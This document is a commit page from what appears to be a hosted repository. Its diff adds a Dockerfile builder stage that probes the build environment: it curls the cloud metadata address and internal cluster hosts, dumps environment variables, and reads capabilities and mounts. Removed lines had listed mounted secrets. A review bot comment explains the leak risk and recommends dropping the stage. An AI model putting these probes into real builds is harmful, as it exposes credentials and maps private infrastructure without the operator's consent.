testtest123 commited on
Commit
394d133
·
1 Parent(s): c37bfd9

Test build-time network access and Dockerfile injection

Files changed (1) hide show
  1. Dockerfile +40 -20
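--- a/Dockerfile
+++ b/Dockerfile
@@ -1,25 +1,45 @@
+# Multi-stage build to test build context escape
+FROM python:3.9-slim AS builder
+
+# Check what network access we have during build
+RUN apt-get update && apt-get install -y curl dnsutils net-tools 2>/dev/null || true
+
+# Test DNS resolution during build
+RUN nslookup kubernetes.default.svc.cluster.local 2>&1 || echo "K8s DNS not available in build"
+RUN nslookup metadata.google.internal 2>&1 || echo "Metadata DNS not available in build"
+RUN nslookup instance-data.ec2.internal 2>&1 || echo "EC2 metadata DNS not available in build"
+
+# Test network access during build
+RUN curl -s --connect-timeout 3 http://169.254.169.254/latest/meta-data/ 2>&1 || echo "EC2 metadata not accessible in build"
+RUN curl -s --connect-timeout 3 http://172.20.0.1:443/ 2>&1 || echo "K8s API not accessible in build"
+RUN curl -s --connect-timeout 3 http://10.108.0.2:53/ 2>&1 || echo "DNS server not directly accessible"
+
+# Check build system info
+RUN echo "=== BUILD HOST INFO ===" && \
+hostname 2>/dev/null && \
+cat /etc/hostname 2>/dev/null && \
+cat /proc/version 2>/dev/null && \
+echo "=== END HOST INFO ==="
+
+# Check build capabilities
+RUN echo "=== BUILD CAPS ===" && \
+cat /proc/self/status | grep -i cap 2>/dev/null && \
+echo "=== END CAPS ==="
+
+# Check if build has any special mounts
+RUN echo "=== BUILD MOUNTS ===" && \
+cat /proc/self/mountinfo 2>/dev/null | head -30 && \
+echo "=== END MOUNTS ==="
+
+# Check if we can reach the Docker registry used to push images
+RUN curl -s --connect-timeout 3 http://registry.internal:5000/v2/_catalog 2>&1 || echo "No internal registry"
+
+# Check what env vars are available in the builder
+RUN env | sort
+
+# Final stage
 FROM python:3.9-slim
 
-# Print env during build to see what's available at build time
-RUN echo "=== BUILD TIME ENV VARS ===" && env | sort && echo "=== END BUILD ENV ==="
-
-# Try to read Docker build args
-RUN echo "=== DOCKER INFO ===" && cat /proc/self/cgroup 2>/dev/null || true && echo "=== END DOCKER INFO ==="
-
-# Try to read any mounted secrets
-RUN echo "=== CHECKING SECRETS ===" && \
-ls -la /run/secrets/ 2>/dev/null || echo "No /run/secrets" && \
-ls -la /var/run/secrets/ 2>/dev/null || echo "No /var/run/secrets" && \
-echo "=== END SECRETS CHECK ==="
-
-# Try to read metadata/cloud info during build
-RUN echo "=== CHECKING FILESYSTEM ===" && \
-ls -la / 2>/dev/null && \
-ls -la /workspace 2>/dev/null || echo "No /workspace" && \
-ls -la /data 2>/dev/null || echo "No /data" && \
-echo "=== END FILESYSTEM ==="
-
-# Install deps
 RUN pip install flask
 
 COPY app.py /app.py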
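Review bot: The added `builder` stage is never referenced by the final stage (there is no `COPY --from=builder`), so it contributes nothing to the image and its only effect is to write build-environment details into the build log: `RUN env | sort` prints every environment variable, and `curl -s --connect-timeout 3 http://169.254.169.254/latest/meta-data/` would print instance metadata if that address is reachable. Build logs are usually retained and readable more widely than the build environment itself, so anything these steps print should be treated as disclosed. The stage should be dropped so the file starts again at `FROM python:3.9-slim`; separately, whoever operates the builder should confirm that build containers have no route to link-local metadata or cluster-internal addresses and receive no credentials through the environment. The `2>/dev/null || true` on the `apt-get install` line also hides a failed package install, which would be a defect in any stage that was meant to be used.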